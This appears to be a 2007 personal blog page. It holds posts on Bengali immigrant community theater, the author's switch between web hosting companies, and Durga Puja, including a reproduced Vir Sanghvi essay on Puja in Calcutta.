After being involved with immigrant Bengali community theater for about 7-8 years, what I find most challenging is to capture the imagination of the community. The issues, the problems, the dreams, the hopes, the frustrations, the achievements of the first generation immigrants are different from the folks back home. Yes, this is true that the first generation, especially we the Bengalis, do enjoy living in a bubble of nostalgia when it comes to culture. We prefer Rabindrasangeet over classic Jazz, Bhimsen Joshi over George Gershwin, Kishore Kumar over Norah Jones. We prefer to go and see the current crops of group theater when we visit Kolkata, but seldom make attempts to see the local repertory theater's productions. However, we do live our lives outside that bubble and constantly get challenged by a different world than what we used to face back home. Our theater should capture that.

In Ron, I thought, Sudiptada could strike the golden balance there where he could evoke a sense of nostalgia within the realm of our everyday existence. Our third production Chhenra Collage also struck that balance, it seems. Even after our tenth production some of the regular audience still refer to the third production. I may have some conjectures as to why this is happening, but cannot really tell for sure. But one thing is for sure, I like to continue doing this kind of theater where we can introspect our contemporary lives with compassion and humor.

Friday, November 09, 2007

One more host change

For the past few days I have been busy with accommodating another change of my host. This is my second change in as many months. I was hosting with 1and1.com since 2005. It was a decent host - excellent top notch service as far as server up-time, availability and speed are concerned. However two of the peeves that I had were it didn't offer enough features for the dough and there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server domains will be 1and1.com; you cannot choose your own username for login, you are forced to remember some random string of digits.

So I moved my host to Dreamhost in October. It has a very impressive array of features for a very decent price. I have seen its server held quite firm after a digg effect on one of the domains it hosted. Also read some reviews which even though didn't put it in the top performer slot, nevertheless put it somewhere near there. Since my site is a very very low traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response is not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problems and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything on his mailbox. He was connecting via IMAP. The only thing he could do is downloading the headers, but server timed-out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. But to be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about the host. More than one review site put it on the top of the heap. It claims to host more than 200,000 domains. Even though most of the things in all Linux hosts are almost same, they have enough differences in settings that warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally I think I am done. The jury is still out, but so far I am seeing improved speed of access. Dada informed me that he now has no problem with mail connection using IMAP. Hopefully I can stay with these guys for some time.

Wednesday, October 24, 2007

Procrastinate

This is the middle of the week. A dose of procrastination will be good for you.
Climbing and moving figures

I have lifted it from somebody else's page. I don't know who created it or who holds the copyright. If you have information, please let me know - I will update this entry. Also, I had to scale down the image to fit in my page without messing up the formatting of the page. The full version is more interesting.

Wednesday, October 17, 2007

Durga Pujo

India is a land of mythology with innumerable gods and goddesses. One of those goddesses is Durga. Durga is a mythical goddess, also referred to in Ramayana. Ram invoked Durga before going to war against Ravan. There are certain days in a year when Durga puja (ritualistic worshipping) happens.

Hindu Bengalis have taken this puja to a different level. It is the Puja to them. It's not so much a religious festival anymore, but has become a social and cultural carnival of the year. West Bengal, especially Kolkata, and I guess Tripura also, goes into an inebriated state for almost a week. The economy rolls as if it were on drugs. Wastage flows on high adrenalin. Everybody, unless there is some significant event of sorrow in life, transcends into a state of undefined exuberance. And that includes poorest of the poor people too, who are never considered when generalized statements are written with the word 'everybody'. This is one of the most inclusive festivals. Not that the poor people's problems and sorrow mitigates overnight, but the way economy rolls in those few days, the earnings of the poor exceeds their normal time earnings.

Today is the start of the festival - Shashthi, the sixth day of the lunar cycle. From the religious point, on this day the goddess is invoked into the idol. The clay dolls come to life and become Dev and Devis. I always find the mythological storytelling of these pujas more interesting than its religious connotations. Puran, the Indian mythology, tells us that this is actually the time when Durga with her four children visits her parental home in Bengal from Kailash where she and the children stay with her husband Shiv. The tenth day of the lunar cycle - Dashami - is when they leave to go back to Kailash. After they leave, the idols become lifeless clay dolls again and are immersed in Ganges and the festival comes to an end.

On this opening day of the festival, I reproduce a wonderful article by Vir Sanghvi on this topic: Durga Pujo in Calcutta (What "Pujo" means to a Bengali). This was published in Hindustan Times some years back.

Durga Pujo in Calcutta (What "Pujo" means to a Bengali)


Vir Sanghvi

It's always hard to explain to somebody who does not live in Calcutta what it is about Puja that makes that period so magical. Before I came to live in Calcutta in 1980, I was only dimly aware of the significance of Puja. I knew the boring facts and figures, of course. I knew what proportion of annual retail sales took place during the Puja period. I knew that the city shut down for the whole week. I knew that at ABP - where I was soon to work - telephone operators would, strangely enough, take the trouble of coming to work, only so that they could receive incoming calls, shout "Pujo", and then hang up on irate out-of-town callers.

It's like Christmas, they told me. Imagine Christmas in New York: Puja means that to a Bengali. Others found more home-grown parallels. It's like Diwali in North India, they said. You know, the shopping, the parties, the festivities and all that stuff.

Actually, of course, it was nothing like Christmas; and certainly nothing like Diwali in North India.

Nothing, in fact, can prepare you for the magic of Puja in Calcutta.

To understand what it means, you have to be here. As the years went on and as I went from Puja to Puja, I tried to work out why nobody could explain to outsiders what it was that made Puja so special. Why was it that I failed as completely as everybody else in communicating the essence of Puja? Why did all the time-honoured comparisons not really ring true; with Dushera, Diwali, Christmas, Easter, Thanksgiving and God alone knows what else?

The answer, I suspect - and after all these years, it is still a suspicion, I have no solutions - is that you can't understand Puja unless you understand Calcutta and unless you understand Bengalis.

Most modern Indian cities strive to rise above ethnicity. Tell anybody who lives in Bombay that he lives in a Maharashtrian city and (unless of course, you are speaking to Bal Thackeray) he will take immediate offence. We are cosmopolitan, he will say indigenously. Tell a Delhiwalla that his is a Punjabi city (which, in many ways, it is) and he will respond with much self-righteous nonsense about being the nation's capital, about the international composition of the city's elite etc. And tell a Bangalorean that he lives in a Kannadiga city and you'll get lots of techno-gaff about the internet revolution and about how Bangalore is even more cosmopolitan than Bombay.

But, the only way to understand what Calcutta is about is to recognize that the city is essentially Bengali. What's more, no Bengali minds you saying that. Rather, he is proud of the fact. Calcutta's strengths and weaknesses mirror those of the Bengali character. It has the drawbacks: the sudden passions, the cheerful chaos, the utter contempt for mere commerce, the fiery response to the smallest provocation.

And it has the strengths (actually, I think of the drawbacks as strengths in their own way). Calcutta embodies the Bengali love of culture; the triumph of intellectualism over greed; the complete transparency of all emotions, the disdain with which hypocrisy and insincerity are treated; the warmth of genuine humanity; and the supremacy of emotion over all other aspects of human existence.

That's why Calcutta is not for everyone. You want your cities clean and green; stick to Delhi. You want your cities, rich and impersonal; go to Bombay. You want them high-tech and full of draught beer; Bangalore's your place.

But if you want a city with a soul: come to Calcutta.

When I look back on the years I've spent in Calcutta - and I come back so many times each year that I often feel I've never been away - I don't remember the things that people remember about cities. When I think of London, I think of the vast open spaces of Hyde Park. When I think of New York, I think of the frenzy of Times Square. When I think of Tokyo, I think of the bright lights of Shinjuku. And when I think of Paris, I think of the Champs Elysées.

But when I think of Calcutta, I never think of any one place. I don't focus on the greenery of the maidan, the beauty of the Victoria Memorial, the bustle of Burra Bazar or the splendour of the new Howrah "Bridge".

I think of people. Because, finally, a city is more than bricks and mortars, street lights and tarred roads. A city is the sum of its people.

And who can ever forget - or replicate - the people of Calcutta?

When I first came to live here, I was told that the city would grow on me. What nobody told me was that the city would change my life. It was in Calcutta that I learnt about true warmth; about simple human decency; about love and friendship; about emotions and caring; about truth and honesty.

I learnt other things too. Coming from Bombay as I did, it was revelation to live in a city where people judged each other on the things that really mattered; where they recognized that being rich did not make you a better person - in fact, it might have the opposite effect. I learnt also that if life is about more than just money, it is about the things that other cities ignore; about culture, about ideas, about art, and about passion.

In Bombay, a man with a relatively low income will salt some of it away for the day when he gets a stock market tip. In Calcutta, a man with exactly the same income will not know the difference between a debenture and a dividend. But he will spend his money on the things that matter. Each morning, he will read at least two newspapers and develop sharply etched views on the state of the world. Each evening, there will be fresh (ideally, fresh-water or river) fish on his table. His children will be encouraged to learn to dance or sing. His family will appreciate the power of poetry. And for him, religion and culture will be in inextricably bound together.

Ah religion!

Tell outsiders about the importance of Puja in Calcutta and they'll scoff. Don't be silly, they'll say. Puja is a religious festival. And Bengal has voted for the CPM since 1977. How can godless Bengal be so hung up on a religious festival? I never know how to explain to them that to a Bengali, religion consists of much more than shouting Jai Shri Ram or pulling down somebody's mosque. It has little to do with meaningless ritual or sinister political activity.

The essence of Puja is that all the passions of Bengal converge: emotion, culture, the love of life, the warmth of being together, the joy of celebration, the pride in artistic expression and yes, the cult of the goddess. It may be about religion. But is not about much more than just worship. In which other part of India would small, not particularly well-off localities, vie with each other to produce the best pandals? Where else could puja pandals go beyond religion to draw inspiration from everything else? In the years I lived in Calcutta, the pandals featured Amitabh Bachchan, Princess Diana and even Saddam Hussain! Where else would children cry with the sheer emotional power of Dashami, upset that the Goddess had left their homes? Where else would the whole city gooseflesh when the dhakis first begin to beat their drums? Which other Indian festival - in any part of the country - is so much about food, about going from one roadside stall to another, following your nose as it trails the smells of cooking?

To understand Puja, you must understand Calcutta. And to understand Calcutta, you must understand the Bengali. It's not easy. Certainly, you can't do it till you come and live here, till you let Calcutta suffuse your being, invade your bloodstream and steal your soul. But once you have, you'll love Calcutta forever. Wherever you go, a bit of Calcutta will go with you.

I know, because it's happened to me. And every Puja, I am overcome by the magic of Bengal. It's a feeling that'll never go away.